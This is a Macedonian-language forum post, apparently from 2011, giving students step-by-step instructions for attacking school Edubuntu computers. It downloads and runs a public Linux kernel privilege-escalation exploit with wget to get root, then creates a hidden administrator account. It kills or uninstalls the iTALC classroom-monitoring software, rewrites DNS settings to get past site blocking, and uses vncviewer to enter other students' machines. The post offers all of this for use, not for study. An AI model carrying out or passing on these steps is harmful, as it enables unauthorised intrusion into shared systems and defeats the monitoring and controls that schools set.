High Definition
Dobrodojdovte na forumot na HD-Team,ve molime registrirajte se i ostanete aktivni.
Welcome to the forum on HD-Team,please register and stay active.

High Definition

Cs1.6
 
HomePortalCalendarFAQSearchMemberlistUsergroupsRegisterLog in
Dobredojdovte na hiqHDefinition Team forum,vi posakuvame prijaten prestoj na nasiot forum!

Share
 

 Trikovi za na skolo

Go down 
AuthorMessage
RageRR
Admin
Admin


Posts : 57
Join date : 2011-03-20

Trikovi za na skolo Empty
PostSubject: Trikovi za na skolo   Trikovi za na skolo EmptyMon Apr 18, 2011 11:50 pm

Како да станеш Админ(root):

1 Чекор: Логирај се како некој ученик, на пример ucenik22
2 Чекор: Оди во горното мени во Апликации--->Услужни--->Терминал. Потоа ке ти се отвори прозорец за задавање команди во Едубунту како што "Command Prompt" во Windows.
3 Чекор: Во него напиши: cd /var/tmp
4 Чекор: Потоа напиши: wget http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz
5 Чекор: Почекај додека Download-от не заврши и стигне до 100%, а потоа напиши: tar -zxvf 2009-linux-sendpage3.tar.gz
6 Чекор: Почекај додека Отпакувањето не заврши и потоа напиши: cd linux-sendpage3
7 Чекор: Потоа напиши: chmod +x *
8 Чекор: Напиши: ./run
9 Чекор: Напиши: bash
Сега си логиран како Админ(root) но само од Терминалот, и за да немораш секогаш да го правиш ова, ќе направиш уште неколку чекори за да направиш свој Админ(root).
10 Чекор: Напиши: adduser x
На местото на x стави го името кое сакаш да ти биде на твојот Админ(root) User ( кога ке те праша за password на новиот User напиши го тој што сакаш да ти биде, но запамти дека додека го внесуваш тоа не се покажува, и потоа стисни ентер). Кај пто пишува Phone или Fullname или нешто слично напиши нешто произволно,
11 Чекор: Напиши: gksu users-admin
12 Чекор: Во прозорот што ќе ти се отвори во листата на User-и најди го твојот User, селектирај го и стисни на копчето "Парамeтри". Во новиот прозор оди горе во привилегии, селектирај ги сите коцки и стисни ОК.
Потоа можеш слободно да ги исклучиш сите прозорци, вклучувај го и Терминалот, да се одлогираш од сегашниот User и да се логираш во твојот Админ-User.

Како да се ослободиш од заклучување на компјутерот или од гледање на презентација

Најпрвин логирајте се во Администраторскиот Аккаоунт.. тоа е објаснато како да го направиш погоре


1. Доколку сакате да го неутрализирате Italc Master додека не ги рестартирате или вклучете компјутерите одново направете ги следниве чекори
- Одете Аплликации -> Услужни -> Терминал
- Потоа напишете: sudo -i за да се логирате како роот и потоа напишете го вашиот пасворд од Администраторскиот аккаунт
- потоа напишете: pkill ica
Одкако ќе го направете ова Italc Master е исклучен и се слободни и тие компјутери кои се поврзани за твоето кујќиште .. но ова трае се додека не го рестартирате компјутерот или исклучите


2. Доколку сакате засекогаш да го избришете Italc Master од вашиот компјутер одете
- Апликации -> Услужни -> Терминал
- Во терминалот напишете: sudo -i за да се логирате како Root
- Потоа напишете: sudo apt-get remove italc-master italc-client
Почекајте околу 10 секунди и Italc Master ќе се избрише .. и сега сте слободни од заклучување

Одблокирање на страни

1. Оди Апликации -> Услужни -> Терминал
2. Потоа напиши: sudo -i <enter>
3. Во следниот чекор напишете: nano /etc/resolv.conf
4. Потоа задршете "Delete" за да избришете сите податоци од тоа што ви е отворено во терминалот
5. Одкако ќе ги избишете во него внесете: nameserver 8.8.8.8 и nameserver 8.8.4.4
6. Потоа притиснете: CTRL + X па Y и <enter> за да го зачувате тоа што го внесовте Исклучете терминал и влезете во која страна што сакате : )
Влегување во други компјутери

Овде е обаснато како да влезите во други компјутери во школо.

Најпрвин логирајте се во вашиот аккаунт со админ ..

1. Отворете: Апликации -> Услушни -> Терминал
2. Потоа напишете: sudo -i за да се логиратее во роот
3. Во следниот чекор напишете: sudo apt-get install xvncviewer
4. Почекајте додека се инсталира vncviewer и потоа
5. Одкако ќе го инсталирате vncviewer напишете во терминал
vncviewer -share 192.168.XXX:X
- на местото од првите два "xx" ќе внесете број на училница во која сакате да влезете .. следниот "X" ќе внесете број на кујќиштето во кое сакате да влезете и во останатото ":X" ќе внесете број на компјутер од "02 до 08"
пример: vncviewer -share 192.168.122:04 ..... бројот 112 е училница 11 кујчиште 2 а бројот :04 е четвртиот компјутер од седумте кои се поврзани на едно кујќиште... притиснете ентер и сте влезени во другиот компјутер...
Back to top Go down
View user profile http://highdefinition.tk/
 
Trikovi za na skolo
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
High Definition :: Spam :: Trikovi za na skolo-
Jump to:  
Vas link ovde Vas link ovde Vas link ovde Vas Link ovde
Vas Link ovde Vas link ovde Vas link ovde Vas link ovde
Free forum | © phpBB | Free forum support | Contact | Report an abuse | Forumotion.com